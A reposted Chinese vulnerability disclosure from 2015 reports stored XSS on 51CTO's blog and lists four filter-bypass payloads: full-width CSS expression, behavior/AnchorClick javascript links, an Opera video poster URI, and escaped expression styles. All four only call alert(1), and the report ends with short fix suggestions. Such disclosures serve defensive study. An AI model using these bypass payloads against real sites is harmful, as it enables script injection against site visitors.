51CTO博客多处存储XSS，各种bypass技巧 - 网站安全-自学php网

主页 > 后端 > 网站安全 >

51CTO博客多处存储XSS，各种bypass技巧 - 网站安全

来源：自学PHP网时间：2015-04-17 11:59 作者：阅读:次

[导读] 1、只针对IE6有效的xss，把style里面的expression换成全角字符。div style=x:ｅｘｐｒｅｓｓｉｏｎ(alert(1))IE6/div2、IE6-IE8，IE9的兼容模式有效的xss，插入如下的代码，当鼠标点击test即触发xss。...

1、只针对IE6有效的xss，把style里面的expression换成全角字符。

<div style="x:ｅｘｐｒｅｓｓｉｏｎ(alert(1))">IE6</div>

2、IE6-IE8，IE9的兼容模式有效的xss，插入如下的代码，当鼠标点击test即触发xss。

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">test</a>

3，只有Opera高版本才会触发

<video body="" poster="javascript:alert(1)//" tabindex="0">

</video>

插入代码.

4，style跨

<img src="../attachment/201212/184326416.jpg" alt="" style="xss:expre\ssion(alert(1))" border="0" />

http://3407504.blog.51cto.com/3397504/1059235

http://3407504.blog.51cto.com/3397504/1090792

修复方案：

1，转换字符编码.

2，behavior限制? 还是在代码后面加个_blank

那些年我们一起学XSS - 9. Dom Xss入门 [隐式输出]

腾讯游戏人生注入漏洞（附分析及绕过方式）

最新评论

加载更多~~

添加评论

更多文章推荐

PhpMyadmin XSRF 缺陷 (执行sql查询)及修复 - 网站安全 2015-04-17
装Win XP SP2前必做八件事 - Windows操作系统 - 自学 2015-04-17
Ananta Gazelle CMS 上传语句注射及修复 - 网站安全 2015-04-17
网趣网上购物系统时尚版10.3注入漏洞及修复 - 网 2015-04-17
Axous 1.1.1多个缺陷 (CSRF -持久型 XSS) - 网站安全 2015-04-17
OpenEMR 4 多个缺陷及修复 - 网站安全 - 自学php 2015-04-17
destoon B2B网站管理系统wap/index.php sql注入漏洞及修 2015-04-17
鲜果网某处CSRF漏洞可蔓延蠕虫 - 网站安全 - 自学 2015-04-17
网站被入侵后的修复和防范 - 网站安全 - 自学p 2015-04-17
Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php)远程php代码 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论